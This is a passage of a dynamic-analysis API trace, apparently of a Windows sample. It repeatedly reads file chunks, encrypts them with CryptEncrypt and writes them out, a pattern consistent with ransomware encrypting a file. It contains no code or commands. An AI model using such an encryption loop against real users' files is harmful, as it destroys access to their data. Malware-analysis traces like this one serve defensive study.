pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.908] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.909] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.909] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.909] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.909] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.909] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.910] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.911] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.911] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.911] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.911] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.911] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.912] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.912] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.912] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.912] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.913] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.913] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.913] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.913] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.913] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.913] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.913] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.913] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.913] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.913] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.914] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.914] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.914] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.914] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.914] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.915] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.915] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.915] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.915] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.915] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.915] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.916] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.916] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.916] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.916] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.916] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.917] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, 